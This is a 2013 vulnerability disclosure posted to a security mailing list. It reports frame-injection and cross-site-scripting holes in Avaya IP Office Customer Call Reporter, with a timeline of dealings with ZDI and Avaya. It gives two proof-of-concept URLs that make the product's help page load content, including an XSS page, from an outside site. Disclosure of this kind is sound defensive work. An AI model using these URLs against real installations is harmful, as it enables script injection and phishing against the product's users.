Hello list! I want to warn you about vulnerabilities in Avaya IP Office Customer Call Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site Scripting) vulnerabilities. After I found multiple vulnerabilities in Avaya IP Office Customer Call Reporter in December, I informed ZDI about them (critical ones). ZDI was very slow in processing these holes (regardless of my remindings) and only at 30th of July they begun actively working with them. I wrote about this case with ZDI in WASC Mailing List (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html). When Avaya ignored my informing in July and ZDI stopped working on this case in August (since Avaya was not responding to them also), I published these two vulnerabilities (the least critical). There are many other vulnerabilities, including critical holes which allow to take control over admin panel, so Avaya still has a chance to get details of vulnerabilities in their product before public disclosure. ------------------------- Affected products: ------------------------- Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012) and 9.0.0.0 (tested recently) and previous versions. ------------------------- Affected vendors: ------------------------- Avaya Inc. http://www.avaya.com ---------- Details: ---------- Remote HTML Include (Frame Injection) (WASC-12): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua Remote XSS Include (Cross-Site Scripting) (WASC-08): http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html ------------ Timeline: ------------ 2012.12.06 - found multiple vulnerabilities (these ones and other critical holes). 2012.12.13 - informed ZDI about other critical vulnerabilities. 2012.12.18 - again informed ZDI about other critical vulnerabilities. 2013.01.27 - registered at zerodayinitiative.com and informed them through the site. ZDI started working on the case. 2013.07.28 - informed Avaya (via two contact forms) about these holes and other critical vulnerabilities, due to slowness of ZDI. 2013.07.29 - wrote about ZDI in WASC Mailing List. 2013.07.30 - if earlier ZDI only pretended they work on the case, then this time they started working actively on it (and tried to contact Avaya). 2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was not responding. 2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua